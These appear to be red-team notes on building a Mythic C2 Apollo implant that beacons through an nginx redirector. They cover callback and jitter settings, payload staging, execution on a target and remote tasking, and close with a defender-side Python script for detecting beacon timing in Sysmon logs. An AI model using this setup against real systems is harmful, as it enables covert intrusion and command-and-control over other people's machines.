NGINX CONDITIONAL REDIRECTION IMPLEMENTATION

This specific payload creation is for use with nginx custom conditional redirection.

root@oco:~$ BROWSER > {MythicC2} > Create > Create Payload
 Target OS: Windows
 Payload Type: Apollo
 Build Parameters: WinExe
 Build Cmds into Agents: All
 C2 Profiles: HTTP
  #this is the nginx machine
  Callback Host: nuclear.{domain}.{tld}              //this is the nginx vm/redirector ip/fqdn - the nginx redirector is responsible for forwarding the traffic back to this C2 server; the payload agents never talk to the C2 server directly!
  Callback Interval in seconds: 10
  Callback Jitter in percent: 23
  #the agent deployed on the target will callback to nginx via 443
  Callback Port: 443
  Crypto Type: aes256_hmac
  Get request URI: index
  HTTP Headers:
   #this user-agent string MUST match the one configured in the c2.conf of nginx configuration file in /etc/nginx/conf.d
   User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    - ALT value: an IPv4 address, if the condition in the /etc/nginx/conf.d file matches on one instead,
       e.g. if ($http_user_agent ~ "41.2.228.0")
  
  Kill Date: default
  Name of Query...: default
  Perform Key Exchange: default
  POST request URI...: default
  Proxy Host: default
  Proxy Password: default
  Proxy Port: default
  Proxy Username: default
 Payload Review
  Payload Name: redirect.exe
  Create Payload

 * this payload can be downloaded from the payload section via the download URL
    - once downloaded by the red team operator, it MUST be transferred to the Payload/Malware Server
       - the target(s) download these payloads from the payload server
#example trigger
PS C:\target> {payload}.exe

MythicC2 > Active Callbacks
 Interaction: whoami
 Interaction: ps
 
 * since all C2 traffic is carried over a TLS/SSL connection, the blue team won't be able
   to see/decrypt the cmds that were executed
    - blue teams should be able to see an outbound ssl/tls connection to the IP of the
      exposed redirector (aws cloudfront)
    - blue teams should also be able to see running processes w/ pids
    - some indicators should also be visible via Windows Event Logs
       - for thorough analysis, deploy sysmon on the hosts and forward the
         logs to a SIEM
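As an added, defender-side example (not part of these notes): the callback interval and jitter configured above (10 s, 23 %) are exactly the timing pattern a SIEM query over Sysmon Event ID 3 (network connection) records can surface. The event records below are constructed sample data, and find_beacons() is a hypothetical helper that flags (process, destination, port) tuples whose inter-connection delay is unusually regular.

```python
"""Beacon-interval detection over constructed Sysmon Event ID 3 records.

Assumes Sysmon network-connection events have been shipped to a SIEM and
normalised to dicts with Image, DestinationIp, DestinationPort, UtcTime.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Constructed sample: one process calling back every ~10 s with +/-23 %
# jitter (the profile configured above), plus a browser whose connections
# to the same port are irregular. Hosts/IPs are placeholders.
BEACON_GAPS = [9.1, 11.8, 8.4, 10.7, 12.2, 7.9, 10.1, 9.6, 11.3, 8.8, 10.4]
BROWSER_GAPS = [1, 40, 3, 120, 2, 7, 300, 5]


def _constructed_events():
    base = datetime(2024, 1, 1, 12, 0, 0)
    events, t = [], base
    for gap in BEACON_GAPS:
        t += timedelta(seconds=gap)
        events.append({"Image": r"C:\Users\target\redirect.exe", "DestinationIp": "203.0.113.10",
                       "DestinationPort": 443, "UtcTime": t})
    t = base
    for gap in BROWSER_GAPS:
        t += timedelta(seconds=gap)
        events.append({"Image": r"C:\Program Files\Browser\browser.exe", "DestinationIp": "198.51.100.5",
                       "DestinationPort": 443, "UtcTime": t})
    return events


SYSMON_EVENTS = _constructed_events()


def find_beacons(events, min_conns=8, max_cv=0.20):
    """Return (key, mean_gap_s, cv) for tuples whose gap between successive
    connections is stable: coefficient of variation <= max_cv. A fixed
    interval with bounded percentage jitter stays well under 0.20; human
    or browser-driven traffic does not."""
    by_dest = defaultdict(list)
    for e in events:
        by_dest[(e["Image"], e["DestinationIp"], e["DestinationPort"])].append(e["UtcTime"])
    hits = []
    for key, times in by_dest.items():
        if len(times) < min_conns:          # too few connections to judge timing
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        m = mean(deltas)
        cv = pstdev(deltas) / m if m else 0.0
        if cv <= max_cv:
            hits.append((key, round(m, 1), round(cv, 3)))
    return hits
```

Run find_beacons(SYSMON_EVENTS) to see only the redirect.exe tuple flagged; in a real SIEM the same grouping is done over hours of data and the thresholds tuned against known-benign periodic software (updaters, telemetry agents).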
